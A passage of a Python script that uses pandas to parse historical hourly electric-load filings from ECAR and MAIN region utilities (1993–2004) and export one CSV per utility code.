2004 : pd.read_fwf('%s/ecar/2004/HEC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9273 : {
1993 : pd.read_fwf('%s/ecar/1993/IPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/IPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/IPL95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/IPL96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/IPL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/IPL98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/IPL99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/IPL00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/IPL01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/IPL02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/IPL03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/IPL04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
10171 : {
1993 : pd.read_fwf('%s/ecar/1993/KUC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/KUC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/KUC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/KUC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/KUC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
11249 : {
1993 : pd.read_fwf('%s/ecar/1993/LGE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/LGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/LGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/LGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/LGE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/LGEE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/LGEE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/LGEE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/LGEE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/LGEE02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/LGEE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/LGEE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13756 : {
1993 : pd.read_fwf('%s/ecar/1993/NIPS93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/NIPS94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/NIPS95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/NIPS96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/NIPS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/NIPS98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/NIPS99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/NIPS00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/NIPS01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/NIPS02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/NIPS03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/NIPS04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13998 : {
1993 : pd.read_fwf('%s/ecar/1993/OES93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/OES94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/OES95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/OES96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
14015 : {
1993 : pd.read_fwf('%s/ecar/1993/OVEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/OVEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/OVEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/OVEC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/OVEC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/OVEC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/OVEC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/OVEC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/OVEC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/OVEC02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/OVEC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/OVEC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
15470 : {
1993 : pd.read_fwf('%s/ecar/1993/PSI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/PSI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/PSI95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
17633 : {
1993 : pd.read_fwf('%s/ecar/1993/SIGE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/SIGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/SIGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/SIGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/SIGE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/SIGE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/SIGE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/SIGE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/SIGE02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/SIGE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/SIGE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
18997 : {
1993 : pd.read_fwf('%s/ecar/1993/TECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/TECO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/TECO95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/TECO96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
40211 : {
1994 : pd.read_fwf('%s/ecar/1994/WVPA94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/ecar/2003/WVPA03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/WVPA04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
32208 : {
1997 : pd.read_fwf('%s/ecar/1997/FE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/FE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/FE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/FE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/FE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/FE02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/FE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/FE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
'mccp' : {
1993 : pd.read_fwf('%s/ecar/1993/MCCP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/MCCP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/MCCP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/MCCP00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/MCCP01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/MCCP02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/MCCP03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/MCCP04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
}
}
# Export the assembled ECAR hourly-load data: one CSV per utility code,
# indexed by hourly timestamp, with zero readings treated as missing.
if not os.path.exists('./ecar'):
    os.mkdir('ecar')
for utility_id in ecar:
    print(utility_id)
    # One hourly-indexed Series per reporting year, anchored at Jan 1 of
    # that year and sized by however many readings the raw file yielded.
    yearly_series = [
        pd.Series(
            ecar[utility_id][yr],
            index=pd.date_range(start=datetime.date(yr, 1, 1),
                                freq='h',
                                periods=len(ecar[utility_id][yr])))
        for yr in ecar[utility_id]
    ]
    combined = pd.DataFrame(pd.concat(yearly_series).sort_index(),
                            columns=['load'])
    # Zeros in the raw filings denote "no data", not zero demand.
    combined['load'] = combined['load'].astype(float).replace(0, np.nan)
    combined.to_csv('./ecar/%s.csv' % utility_id)
###### MAIN
# CECO : 4110
# CILC: 3252 <- Looks like something is getting cut off from 1993-2000
# CIPS: 3253
# IPC: 9208
# MGE: 11479
# SIPC: 17632
# SPIL: 17828
# UE: 19436
# WEPC: 20847
# WPL: 20856
# WPS: 20860
# UPP: 19578
# WPPI: 20858
# AMER: 19436  (NOTE: same respondent code as UE above — the dict below has
#               two 19436 entries, and the later AMER entry silently
#               overwrites the earlier UE entry; only AMER years survive)
# CWL: 4045
main = {
4110 : {
1993 : pd.read_fwf('%s/main/1993/CECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=2, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_csv('%s/main/1995/CECO95' % (fulldir), skiprows=3, header=None)[0].values,
1996 : pd.read_csv('%s/main/1996/CECO96' % (fulldir), skiprows=4, header=None)[1].values,
1997 : pd.read_csv('%s/main/1997/CECO97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=4, header=None)[3].values,
1998 : pd.read_csv('%s/main/1998/CECO98' % (fulldir), sep='\s', skipinitialspace=True, skiprows=5, header=None)[5].values,
1999 : pd.read_csv('%s/main/1999/CECO99' % (fulldir), sep='\t', skipinitialspace=True, skiprows=5, header=None)[1].values,
2000 : pd.read_csv('%s/main/2000/CECO00' % (fulldir), sep='\t', skipinitialspace=True, skiprows=5, header=None)[1].values,
2001 : pd.read_csv('%s/main/2001/CECO01' % (fulldir), sep='\t', skipinitialspace=True, skiprows=5, header=None)[1].values,
2002 : pd.read_csv('%s/main/2002/CECO02' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None)[2].values
},
3252 : {
1993 : pd.read_fwf('%s/main/1993/CILC93' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1994 : pd.read_fwf('%s/main/1994/CILC94' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1995 : pd.read_fwf('%s/main/1995/CILC95' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1996 : pd.read_fwf('%s/main/1996/CILC96' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1997 : pd.read_fwf('%s/main/1997/CILC97' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1998 : pd.read_fwf('%s/main/1998/CILC98' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1999 : pd.read_fwf('%s/main/1999/CILC99' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
2000 : pd.read_excel('%s/main/2000/CILC00' % (fulldir), skiprows=4).loc[:, 'Hour 1':'Hour 24'].values.ravel(),
2001 : pd.read_excel('%s/main/2001/CILC01' % (fulldir), skiprows=4).loc[:, 'Hour 1':'Hour 24'].values.ravel(),
2002 : pd.read_excel('%s/main/2002/CILC02' % (fulldir), skiprows=4).loc[:, 'Hour 1':'Hour 24'].values.ravel(),
2003 : pd.read_csv('%s/main/2003/CILC03' % (fulldir), skiprows=1, sep='\t').iloc[:, -1].values
},
3253 : {
1993 : pd.read_fwf('%s/main/1993/CIPS93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/main/1994/CIPS94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/main/1995/CIPS95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/main/1996/CIPS96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/main/1997/CIPS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9208 : {
1993 : pd.read_csv('%s/main/1993/IPC93' % (fulldir), skipfooter=1, header=None)[2].values,
1994 : pd.read_csv('%s/main/1994/IPC94' % (fulldir), skipfooter=1, header=None)[2].values,
1995 : pd.read_csv('%s/main/1995/IPC95' % (fulldir), skipfooter=1, header=None)[4].astype(str).str.replace('.', '0').astype(float).values,
1996 : pd.read_csv('%s/main/1996/IPC96' % (fulldir)).iloc[:, -1].values,
1997 : pd.read_csv('%s/main/1997/IPC97' % (fulldir)).iloc[:, -1].values,
1998 : pd.read_excel('%s/main/1998/IPC98' % (fulldir)).iloc[:, -1].values,
1999 : pd.read_csv('%s/main/1999/IPC99' % (fulldir), skiprows=2, header=None)[1].values,
2000 : pd.read_excel('%s/main/2000/IPC00' % (fulldir), skiprows=1).iloc[:, -1].values,
2001 : pd.read_excel('%s/main/2001/IPC01' % (fulldir), skiprows=1).iloc[:, -1].values,
2002 : pd.read_excel('%s/main/2002/IPC02' % (fulldir), skiprows=4).iloc[:, -1].values,
2003 : pd.read_excel('%s/main/2003/IPC03' % (fulldir), skiprows=1).iloc[:, -1].values,
2004 : pd.read_excel('%s/main/2004/IPC04' % (fulldir), skiprows=1).iloc[:, -1].values
},
11479 : {
1993 : pd.read_fwf('%s/main/1993/MGE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=4).iloc[:, 1:].dropna().astype(float).values.ravel(),
1995 : pd.read_csv('%s/main/1995/MGE95' % (fulldir), sep=' ', skipinitialspace=True, header=None)[2].values,
1997 : pd.read_csv('%s/main/1997/MGE97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=12, header=None).iloc[:-1, 2].astype(float).values,
1998 : pd.read_csv('%s/main/1998/MGE98' % (fulldir), sep=' ', skipinitialspace=True).iloc[:-1]['LOAD'].astype(float).values,
1999 : pd.read_csv('%s/main/1999/MGE99' % (fulldir), sep=' ', skiprows=2, header=None, skipinitialspace=True).iloc[:-2, 2].astype(float).values,
2000 : pd.read_csv('%s/main/2000/MGE00' % (fulldir), sep=' ', skiprows=3, header=None, skipinitialspace=True, skipfooter=2).iloc[:, 2].astype(float).values,
2000 : pd.read_fwf('%s/main/2000/MGE00' % (fulldir), skiprows=2)['VMS_DATE'].iloc[:-2].str.split().str[-1].astype(float).values,
2001 : pd.read_fwf('%s/main/2001/MGE01' % (fulldir), skiprows=1, header=None).iloc[:-2, 2].values,
2002 : pd.read_fwf('%s/main/2002/MGE02' % (fulldir), skiprows=4, header=None).iloc[:-1, 0].str.split().str[-1].astype(float).values
},
17632 : {
